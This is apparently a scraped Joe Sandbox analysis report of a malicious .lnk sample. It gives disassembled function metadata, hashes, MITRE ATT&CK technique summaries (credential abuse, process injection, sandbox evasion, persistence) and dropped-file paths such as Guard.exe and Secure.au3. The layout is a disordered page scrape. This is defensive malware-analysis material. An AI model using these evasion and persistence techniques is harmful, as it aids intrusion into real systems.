API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b7b2e5547b55ed471f1097bb1b885817cd3e0d96628b0fd83fe392b255f2b2ec
Instruction ID: 86a1f7d106f6c13a2779638db63c747764f5346559c9ba80fa8340c91a56268d
Opcode Fuzzy Hash: b7b2e5547b55ed471f1097bb1b885817cd3e0d96628b0fd83fe392b255f2b2ec
Instruction Fuzzy Hash: 10F039B1245701CFCB349F64E49481ABBF9BF94325320893EE2E783650C731A984DF94

Function 00904AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00904AD0

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: e7bbd9f610136f6fb0ed83483750282b974b9fb84063390aa4f9294eb4ce12e6
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: BAF0587250020DFFDF04DF80C941EAABB79FB44314F208589F9198A212D336DA21AB90

Function 009109C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 009109E4

Part of subcall function 00901821: _memmove.LIBCMT ref: 0090185B

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 1d6106e11c4010aacf5d0b343be49483b7575fe64010ea726a8dc2ba84e7ce49
Instruction ID: 94065b15fa8cb1b5b40aa684a2786bc05de0658d1d19048aa0282688405dfd77
Opcode Fuzzy Hash: 1d6106e11c4010aacf5d0b343be49483b7575fe64010ea726a8dc2ba84e7ce49
Instruction Fuzzy Hash: 62E086329041285BC72196989C05FEA77EDDBC9790F0441B6FC08D7348D9609D918691

Function 00954D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00954D31

Part of subcall function 00901821: _memmove.LIBCMT ref: 0090185B

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: c0776c1f559cae5cda194eca4ec105ed13e484686a182f0405ae8d651bb1100e
Instruction ID: 00ab20c30f8908c3d26aa9fb1f4bdd93af8f8c82c230224a92edc151e51e96da
Opcode Fuzzy Hash: c0776c1f559cae5cda194eca4ec105ed13e484686a182f0405ae8d651bb1100e
Instruction Fuzzy Hash: 55D05EB191032C2FDB60E6B49C0DDB77BACD784220F0006A1BC5CD3252E9249D4586E0

Function 009042AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,009406E6,00000000,00000000,00000000), ref: 009042BF

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 02f89c1657840d6b0ed085fecb18071c15ba13630306a5aa2e8f3fd503581156
Instruction ID: 43c9e86e716578e62e659289bbdbfc3718ab88d8b332826b699dae9373db5e74
Opcode Fuzzy Hash: 02f89c1657840d6b0ed085fecb18071c15ba13630306a5aa2e8f3fd503581156
Instruction Fuzzy Hash: 0CD0C77465420CBFE710CB80DC46FA9777CE745710F100194FD0466390D6B27D549795

Function 00954FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00953BFE), ref: 00954FED

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b0ca160e92672fe25857805cb85e76ff8322def61173daa6bed24fd111896db1
Instruction ID: 48a16c6457e6520a012f08038472f401532cf89f1bdaabd2a4edd7bc84024234
Opcode Fuzzy Hash: b0ca160e92672fe25857805cb85e76ff8322def61173daa6bed24fd111896db1
Instruction Fuzzy Hash: 19B09234014680769DA85E3D194C499330958823BE7D81B81EC78855E5D239988FA720

Function 0095C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00954005: FindFirstFileW.KERNEL32(?,?), ref: 0095407C
Part of subcall function 00954005: DeleteFileW.KERNEL32(?,?,?,?), ref: 009540CC
Part of subcall function 00954005: FindNextFileW.KERNEL32(00000000,00000010), ref: 009540DD
Part of subcall function 00954005: FindClose.KERNEL32(00000000), ref: 009540F4

GetLastError.KERNEL32 ref: 0095C292

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 8e93cc6ec6223c3fa6f828a7e57c32491accacf5d4e90490922619e7e6025bf3
Instruction ID: 7542ceddc94b0406c10f2c840d09b3f4e4a994fccdca325eb6cbfa21f002dfff
Opcode Fuzzy Hash: 8e93cc6ec6223c3fa6f828a7e57c32491accacf5d4e90490922619e7e6025bf3
Instruction Fuzzy Hash: 07F08C322102148FDB10EF69D850B6AB7E9FF88320F05801AFA09CB392CB70BC01CB95

Function 009042CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00932F8B), ref: 009042EF

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 28233479e7506b801b05811a004e7f8810df91b8fb6e062236bc940f0d9495ea
Instruction ID: 89ac16a25f524177c9c7e40328aacd9cd52e66710e79f1a32fe8ac597086c14d
Opcode Fuzzy Hash: 28233479e7506b801b05811a004e7f8810df91b8fb6e062236bc940f0d9495ea
Instruction Fuzzy Hash: 11E092B5500B01CFC3314F1AE804412FBE8FFE13613214A2EE1E6926A0D3B0589A9B50

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tzA45NGAW4.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\Public\Guard.exe

C:\Users\Public\PublicProfile.ps1

C:\Users\Public\Secure.au3

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4f87fc.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ab90bbcc-ce49-49f8-8504-525be5930984.tmp

Windows Analysis Report
tzA45NGAW4.lnk

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre